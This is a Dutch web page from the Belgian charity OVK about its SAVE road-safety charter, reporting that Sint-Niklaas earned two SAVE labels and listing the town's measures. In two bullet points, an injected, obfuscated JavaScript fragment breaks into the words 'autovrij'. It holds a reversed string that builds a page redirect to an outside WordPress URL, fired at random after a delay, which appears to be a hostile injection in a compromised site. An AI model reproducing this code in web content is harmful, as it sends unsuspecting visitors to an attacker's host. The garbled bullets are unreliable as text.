Met het SAVE-Charter Steden & Gemeenten wil de vzw Ouders van Verongelukte Kinderen (OVK) de Belgische steden en gemeenten betrekken bij haar strijd tegen de (nog steeds) te grote verkeersonveiligheid in ons land.

Op deze website vindt u meer informatie over het SAVE-charter. Daarnaast is er ook verdere informatie terug te vinden over OVK en haar werking.

Sint-Niklaas eerste stad met 2 SAVE-labels

Sinds 20 mei is Sint-Niklaas de eerste stad in Vlaanderen die twee SAVE-labels mocht ontvangen als beloning voor hun inspanningen rond verkeersveiligheid.

Voorafgaand aan de uitreiking van het SAVE-label ontvingen de eerste Sint-Niklase scholen het startlabel verkeersveilige school. Deze labels komen er nadat ze vorig jaar het scholencharter ondertekenden. Hierbij engageerden ze zich om de verkeersveiligheid in de schoolomgeving te verbeteren. Dat deden ze onder meer via educatie, sensibilisering, duurzame mobiliteit en een veilige infrastructuur. Het scholencharter was één van de acties opgenomen in het tweede SAVE-actieplan van Sint-Niklaas.

Naast het scholencharter zette Sint-Niklaas tijdens hun 2e actiejaar ook in op onder andere:

  • De opmaak en goedkeuring van een nieuw mobiliteitsplan en fietsbeleidsplan.
  • Het autoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tovrij maken van de Stationsstraat.
  • Trage wegen en dooRlopende straten.
  • 4 fietsstraten
  • De uitwerking van de ondersteuning van gemachtigde opzichters in schoolomgevingen.
  • Een eerste autoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tovrije zondag.

 


© 2012 O.V.K. vzw - Léon Theodorstraat 85, 1090 Brussel - Tel: 02/427.75.00 - info@ovk.be